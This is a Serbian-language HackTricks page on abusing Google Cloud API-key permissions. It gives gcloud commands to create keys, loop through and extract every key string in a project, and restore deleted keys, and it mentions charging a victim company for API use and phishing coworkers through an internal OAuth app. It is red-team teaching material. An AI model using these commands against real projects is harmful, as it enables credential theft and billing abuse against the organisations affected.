GCP - Apikeys Privesc

Reading time: 4 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Apikeys

Sledeće dozvole su korisne za kreiranje i krađu API ključeva, ne zaboravite ovo iz dokumentacije: API ključ je jednostavna enkriptovana niska koja identifikuje aplikaciju bez ikakvog principala. Korisni su za pristup javnim podacima anonimno, i koriste se za povezivanje API zahteva sa vašim projektom za kvotu i naplatu.

Dakle, sa API ključem možete naterati tu kompaniju da plati za vašu upotrebu API-a, ali nećete moći da eskalirate privilegije.

Za više informacija o API ključevima proverite:

GCP - API Keys Enum

Za druge načine kreiranja API ključeva proverite:

GCP - Serviceusage Privesc

Brute Force API Key access

Pošto možda ne znate koje API-je su omogućene u projektu ili ograničenja primenjena na API ključ koji ste pronašli, bilo bi zanimljivo pokrenuti alat https://github.com/ozguralp/gmapsapiscanner i proveriti šta možete pristupiti sa API ključem.

apikeys.keys.create

Ova dozvola omogućava da kreirate API ključ:

bash
gcloud services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
"@type":"type.googleapis.com/google.api.apikeys.v2.Key",
"createTime":"2022-01-26T12:23:06.281029Z",
"etag":"W/\"HOhA[...]==\"",
"keyString":"AIzaSy[...]oU",
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
"updateTime":"2022-01-26T12:23:06.378442Z"
}

Možete pronaći skriptu za automatizaciju kreiranja, eksploatacije i čišćenja ranjivog okruženja ovde.

caution

Imajte na umu da po defaultu korisnici imaju dozvole za kreiranje novih projekata i dodeljuje im se uloga Vlasnika nad novim projektom. Tako da korisnik može kreirati projekat i API ključ unutar ovog projekta.

apikeys.keys.getKeyString , apikeys.keys.list

Ove dozvole omogućavaju listanje i dobijanje svih apiKeys i dobijanje Ključa:

bash
for  key  in  $(gcloud services api-keys list --uri); do
gcloud services api-keys get-key-string "$key"
done

Možete pronaći skriptu za automatizaciju kreiranja, eksploatacije i čišćenja ranjivog okruženja ovde.

apikeys.keys.undelete , apikeys.keys.list

Ove dozvole vam omogućavaju da prikazujete i regenerišete obrisane API ključeve. API ključ se daje u izlazu nakon što je obrisano:

bash
gcloud services api-keys list --show-deleted
gcloud services api-keys undelete <key-uid>

Kreirajte internu OAuth aplikaciju za phishing drugih radnika

Proverite sledeću stranicu da biste saznali kako to učiniti, iako ova akcija pripada servisu clientauthconfig prema dokumentaciji:

GWS - Google Platforms Phishing

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks